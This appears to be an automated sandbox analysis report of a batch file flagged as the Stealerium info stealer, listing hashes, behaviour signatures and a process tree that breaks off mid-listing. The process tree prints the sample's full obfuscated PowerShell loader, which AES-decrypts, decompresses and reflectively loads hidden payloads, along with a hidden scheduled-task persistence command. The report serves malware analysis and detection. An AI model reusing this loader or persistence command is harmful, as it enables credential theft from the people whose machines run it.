Overview

overview

10

Static

static

1

stub.bat

windows7-x64

8

stub.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    116s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-05-2024 21:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    stub.bat

  • Size

    2.3MB

  • MD5

    e49ed1028bf0c289d62cdca6b440d752

  • SHA1

    e3f18d496cdb64b2e3388bfd579cfd59adc70752

  • SHA256

    4d930eaabcd25150ee60e0f5f9147aedc06837c09a254186eaad4d78a118a782

  • SHA512

    15f8d558479b7c03cecc7aa3ec734a762941d7b20a246cfad1e6f24aa8b6eadf351a48ca953dc5123429d52f7f0a20d21104f4ae52bdcbc584f26587be1e9604

  • SSDEEP

    24576:gMID2TZRnCMGHJLYk5kqzJwwDxxBJOU7gqsiX5PFxobyCByo1/xdTYu3CgM0ZFwX:gMNXWjGCf2bu1j4R6A8

Score
10/10
stealeriumevasionexecutionstealer

Malware Config

Signatures

  • Modifies firewall policy service 2 TTPs 3 IoCs
    evasion
  • Modifies security service 2 TTPs 4 IoCs
    evasion
  • Stealerium

    An open source info stealer written in C# first seen in May 2022.

    stealerstealerium
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 18 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 40 IoCs
  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 59 IoCs
  • Suspicious use of SendNotifyMessage 56 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Drops file in System32 directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:800
    • C:\Windows\system32\BackgroundTransferHost.exe
      "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
      2⤵
        PID:4980
      • C:\Windows\system32\backgroundTaskHost.exe
        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
        2⤵
          PID:3084
        • C:\Windows\system32\backgroundTaskHost.exe
          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
          2⤵
            PID:4980
          • C:\Windows\System32\CompPkgSrv.exe
            C:\Windows\System32\CompPkgSrv.exe -Embedding
            2⤵
              PID:208
            • C:\Windows\System32\CompPkgSrv.exe
              C:\Windows\System32\CompPkgSrv.exe -Embedding
              2⤵
                PID:388
              • C:\Windows\system32\BackgroundTaskHost.exe
                "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
                2⤵
                  PID:1112
                • C:\Windows\System32\RuntimeBroker.exe
                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                  2⤵
                    PID:5076
                  • C:\Windows\System32\CompPkgSrv.exe
                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                    2⤵
                      PID:5208
                    • C:\Windows\system32\backgroundTaskHost.exe
                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                      2⤵
                        PID:4120
                      • C:\Windows\system32\backgroundTaskHost.exe
                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                        2⤵
                          PID:3740
                        • C:\Windows\system32\BackgroundTransferHost.exe
                          "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                          2⤵
                            PID:1780
                          • C:\Windows\system32\backgroundTaskHost.exe
                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                            2⤵
                              PID:1576
                            • C:\Windows\system32\BackgroundTransferHost.exe
                              "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                              2⤵
                                PID:2384
                              • C:\Windows\system32\BackgroundTransferHost.exe
                                "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                2⤵
                                  PID:5116
                                • C:\Windows\system32\backgroundTaskHost.exe
                                  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                  2⤵
                                    PID:4104
                                  • C:\Windows\system32\BackgroundTaskHost.exe
                                    "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
                                    2⤵
                                      PID:2276
                                    • C:\Windows\System32\RuntimeBroker.exe
                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                      2⤵
                                        PID:5148
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k RPCSS -p
                                      1⤵
                                        PID:904
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                        1⤵
                                          PID:956
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                          1⤵
                                            PID:392
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                            1⤵
                                              PID:924
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                                              1⤵
                                                PID:1060
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                1⤵
                                                • Drops file in System32 directory
                                                PID:1100
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                1⤵
                                                • Drops file in System32 directory
                                                PID:1116
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                1⤵
                                                  PID:1124
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                  1⤵
                                                    PID:1144
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                    1⤵
                                                      PID:1256
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                      1⤵
                                                        PID:1288
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                        1⤵
                                                          PID:1340
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                          1⤵
                                                            PID:1392
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                            1⤵
                                                              PID:1428
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                              1⤵
                                                                PID:1564
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                1⤵
                                                                  PID:1580
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                  1⤵
                                                                    PID:1628
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                    1⤵
                                                                      PID:1700
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                      1⤵
                                                                        PID:1732
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                        1⤵
                                                                          PID:1740
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                          1⤵
                                                                          • Modifies Internet Explorer settings
                                                                          PID:1836
                                                                          • C:\Windows\system32\AUDIODG.EXE
                                                                            C:\Windows\system32\AUDIODG.EXE 0x4f8 0x32c
                                                                            2⤵
                                                                              PID:5748
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                            1⤵
                                                                              PID:1936
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                              1⤵
                                                                                PID:1948
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                                1⤵
                                                                                  PID:1992
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                  1⤵
                                                                                    PID:1624
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                    1⤵
                                                                                      PID:1696
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                                                      1⤵
                                                                                      • Modifies firewall policy service
                                                                                      • Modifies security service
                                                                                      PID:2152
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                      1⤵
                                                                                        PID:2240
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                        1⤵
                                                                                          PID:2256
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                          1⤵
                                                                                            PID:2552
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                            1⤵
                                                                                            • Drops file in System32 directory
                                                                                            PID:2628
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                            1⤵
                                                                                              PID:2640
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                              1⤵
                                                                                                PID:2704
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                                1⤵
                                                                                                  PID:2748
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                                  1⤵
                                                                                                    PID:2804
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                    1⤵
                                                                                                      PID:2812
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                      1⤵
                                                                                                        PID:3048
                                                                                                      • C:\Windows\Explorer.EXE
                                                                                                        C:\Windows\Explorer.EXE
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                        • Suspicious use of UnmapMainImage
                                                                                                        PID:3340
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\stub.bat"
                                                                                                          2⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4628
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wFHZlpcUkL8mgXVyBku7iyaIiR3uArGUIdDRouRIrZ4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QOY4Cv+wyXX2do7aiffgdQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jlrYc=New-Object System.IO.MemoryStream(,$param_var); $bmDYr=New-Object System.IO.MemoryStream; $QKSMF=New-Object System.IO.Compression.GZipStream($jlrYc, [IO.Compression.CompressionMode]::Decompress); $QKSMF.CopyTo($bmDYr); $QKSMF.Dispose(); $jlrYc.Dispose(); $bmDYr.Dispose(); $bmDYr.ToArray();}function execute_function($param_var,$param2_var){ $IMXEX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oyYtu=$IMXEX.EntryPoint; $oyYtu.Invoke($null, $param2_var);}$hhBxF = 'C:\Users\Admin\AppData\Local\Temp\stub.bat';$host.UI.RawUI.WindowTitle = $hhBxF;$fGGWD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($hhBxF).Split([Environment]::NewLine);foreach ($jTXro in $fGGWD) { if ($jTXro.StartsWith('vjpcDvZGGpfgJCuMbyNz')) { $pwxWX=$jTXro.Substring(20); break; }}$payloads_var=[string[]]$pwxWX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                            3⤵
                                                                                                              PID:1516
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                              3⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:1312
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_986_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_986.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                                4⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:224
                                                                                                              • C:\Windows\System32\WScript.exe
                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_986.vbs"
                                                                                                                4⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4592
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_986.bat" "
                                                                                                                  5⤵
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:2220
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wFHZlpcUkL8mgXVyBku7iyaIiR3uArGUIdDRouRIrZ4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QOY4Cv+wyXX2do7aiffgdQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jlrYc=New-Object System.IO.MemoryStream(,$param_var); $bmDYr=New-Object System.IO.MemoryStream; $QKSMF=New-Object System.IO.Compression.GZipStream($jlrYc, [IO.Compression.CompressionMode]::Decompress); $QKSMF.CopyTo($bmDYr); $QKSMF.Dispose(); $jlrYc.Dispose(); $bmDYr.Dispose(); $bmDYr.ToArray();}function execute_function($param_var,$param2_var){ $IMXEX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oyYtu=$IMXEX.EntryPoint; $oyYtu.Invoke($null, $param2_var);}$hhBxF = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_986.bat';$host.UI.RawUI.WindowTitle = $hhBxF;$fGGWD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($hhBxF).Split([Environment]::NewLine);foreach ($jTXro in $fGGWD) { if ($jTXro.StartsWith('vjpcDvZGGpfgJCuMbyNz')) { $pwxWX=$jTXro.Substring(20); break; }}$payloads_var=[string[]]$pwxWX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                                    6⤵
                                                                                                                      PID:808
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                                      6⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:3908
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp77D0.tmp.bat
                                                                                                                        7⤵
                                                                                                                          PID:1980
                                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                                            chcp 65001
                                                                                                                            8⤵
                                                                                                                              PID:2820
                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                              TaskKill /F /IM 3908
                                                                                                                              8⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:4812
                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                              Timeout /T 2 /Nobreak
                                                                                                                              8⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:1928
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                                                                                                                  2⤵
                                                                                                                  • Enumerates system info in registry
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                  PID:1140
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9e5a446f8,0x7ff9e5a44708,0x7ff9e5a44718
                                                                                                                    3⤵
                                                                                                                      PID:4928
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
                                                                                                                      3⤵
                                                                                                                        PID:5060
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
                                                                                                                        3⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:3124
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
                                                                                                                        3⤵
                                                                                                                          PID:2860
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
                                                                                                                          3⤵
                                                                                                                            PID:2360
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
                                                                                                                            3⤵
                                                                                                                              PID:4688
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
                                                                                                                              3⤵
                                                                                                                                PID:3184
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4352 /prefetch:1
                                                                                                                                3⤵
                                                                                                                                  PID:5040
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3432 /prefetch:8
                                                                                                                                  3⤵
                                                                                                                                    PID:872
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3432 /prefetch:8
                                                                                                                                    3⤵
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:4488
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1
                                                                                                                                    3⤵
                                                                                                                                      PID:3268
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
                                                                                                                                      3⤵
                                                                                                                                        PID:5356
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
                                                                                                                                        3⤵
                                                                                                                                          PID:5364
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1
                                                                                                                                          3⤵
                                                                                                                                            PID:5520
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5868 /prefetch:8
                                                                                                                                            3⤵
                                                                                                                                              PID:5828
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5880 /prefetch:8
                                                                                                                                              3⤵
                                                                                                                                              • Modifies registry class
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:5836
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
